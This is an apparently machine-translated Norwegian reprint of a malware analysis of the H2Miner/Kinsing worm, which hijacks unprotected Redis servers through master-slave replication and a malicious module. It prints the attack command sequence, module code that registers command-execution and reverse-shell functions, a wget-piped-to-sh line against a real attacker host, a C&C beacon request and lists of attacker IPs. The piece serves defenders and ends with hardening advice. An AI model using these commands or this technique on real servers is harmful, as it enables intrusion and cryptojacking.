For en dag siden ble en av prosjektets servere angrepet av en lignende orm. På jakt etter et svar på spørsmålet "hva var det?" Jeg fant en flott artikkel av Alibaba Cloud Security-teamet. Siden jeg ikke fant denne artikkelen på Habré, bestemte jeg meg for å oversette den spesielt for deg <3
Entry
Nylig oppdaget Alibaba Clouds sikkerhetsteam et plutselig utbrudd av H2Miner. Denne typen ondsinnet orm bruker mangelen på autorisasjon eller svake passord for Redis som inngangsporter til systemene dine, hvoretter den synkroniserer sin egen ondsinnede modul med slaven gjennom master-slave-synkronisering og til slutt laster ned denne ondsinnede modulen til den angrepne maskinen og kjører ondsinnet modul. bruksanvisning.
Tidligere ble angrep på systemene dine primært utført ved hjelp av en metode som involverte planlagte oppgaver eller SSH-nøkler som ble skrevet til maskinen din etter at angriperen logget på Redis. Heldigvis kan denne metoden ikke brukes ofte på grunn av problemer med tillatelseskontroll eller på grunn av forskjellige systemversjoner. Denne metoden for å laste en ondsinnet modul kan imidlertid utføre angriperens kommandoer direkte eller få tilgang til skallet, noe som er farlig for systemet ditt.
På grunn av det store antallet Redis-servere som er vert på Internett (nesten 1 million), anbefaler Alibaba Clouds sikkerhetsteam, som en vennlig påminnelse, at brukere ikke deler Redis på nettet og regelmessig sjekker styrken til passordene deres og om de er kompromittert. raskt valg.
H2Miner
H2Miner er et gruvebotnett for Linux-baserte systemer som kan invadere systemet ditt på en rekke måter, inkludert mangel på autorisasjon i Hadoop-garn, Docker og Redis remote command execution (RCE) sårbarheter. Et botnett fungerer ved å laste ned ondsinnede skript og skadelig programvare for å gruve dataene dine, utvide angrepet horisontalt og opprettholde kommando og kontroll (C&C) kommunikasjon.
Redis RCE
Kunnskap om dette emnet ble delt av Pavel Toporkov på ZeroNights 2018. Etter versjon 4.0 støtter Redis en plug-in-lastingsfunksjon som gir brukerne muligheten til å laste inn filer kompilert med C i Redis for å utføre spesifikke Redis-kommandoer. Selv om denne funksjonen er nyttig, inneholder den en sårbarhet der filer i master-slave-modus kan synkroniseres med slaven via fullresync-modus. Dette kan brukes av en angriper til å overføre skadelige filer. Etter at overføringen er fullført, laster angriperne modulen til den angrepne Redis-forekomsten og utfører en kommando.
Malware Worm Analyse
Nylig oppdaget Alibaba Cloud-sikkerhetsteamet at størrelsen på H2Miners ondsinnede gruvearbeidergruppe plutselig har økt dramatisk. I følge analysen er den generelle prosessen med angrepsforekomst som følger:
H2Miner bruker RCE Redis for et fullverdig angrep. Angripere angriper først ubeskyttede Redis-servere eller servere med svake passord.
Deretter bruker de kommandoen config set dbfilename red2.so for å endre filnavnet. Etter dette utfører angriperne kommandoen slaveof for å angi master-slave-replikeringsvertsadressen.
Når den angrepne Redis-forekomsten etablerer en master-slave-forbindelse med den ondsinnede Redis som eies av angriperen, sender angriperen den infiserte modulen ved å bruke fullresync-kommandoen for å synkronisere filene. Red2.so-filen vil da bli lastet ned til den angrepne maskinen. Angriperne bruker deretter lastemodulen ./red2.so for å laste denne so-filen. Modulen kan utføre kommandoer fra en angriper eller starte en omvendt tilkobling (bakdør) for å få tilgang til den angrepne maskinen.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Etter å ha utført en ondsinnet kommando som f.eks / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, vil angriperen tilbakestille backupfilnavnet og laste ut systemmodulen for å rydde opp i sporene. Red2.so-filen vil imidlertid fortsatt forbli på den angrepne maskinen. Brukere anbefales å ta hensyn til tilstedeværelsen av en slik mistenkelig fil i mappen til Redis-forekomsten deres.
I tillegg til å drepe noen ondsinnede prosesser for å stjele ressurser, fulgte angriperen et ondsinnet skript ved å laste ned og kjøre ondsinnede binære filer til . Dette betyr at prosessnavnet eller katalognavnet som inneholder kinsing på verten kan indikere at maskinen har blitt infisert av dette viruset.
I følge omvendt utviklingsresultater utfører skadelig programvare hovedsakelig følgende funksjoner:
- Laste opp filer og kjøre dem
- Gruvedrift
- Vedlikeholde C&C-kommunikasjon og utføre angriperkommandoer
Bruk masscan for ekstern skanning for å utvide din innflytelse. I tillegg er IP-adressen til C&C-serveren hardkodet i programmet, og den angrepne verten vil kommunisere med C&C-kommunikasjonsserveren ved hjelp av HTTP-forespørsler, hvor zombie-informasjonen (kompromittert server) identifiseres i HTTP-headeren.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Andre angrepsmetoder
Adresser og lenker som brukes av ormen
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Rådet
For det første skal Redis ikke være tilgjengelig fra Internett og bør beskyttes med et sterkt passord. Det er også viktig at klienter sjekker at det ikke er noen red2.so-fil i Redis-katalogen og at det ikke er noen "kinsing" i fil-/prosessnavnet på verten.
Kilde: www.habr.com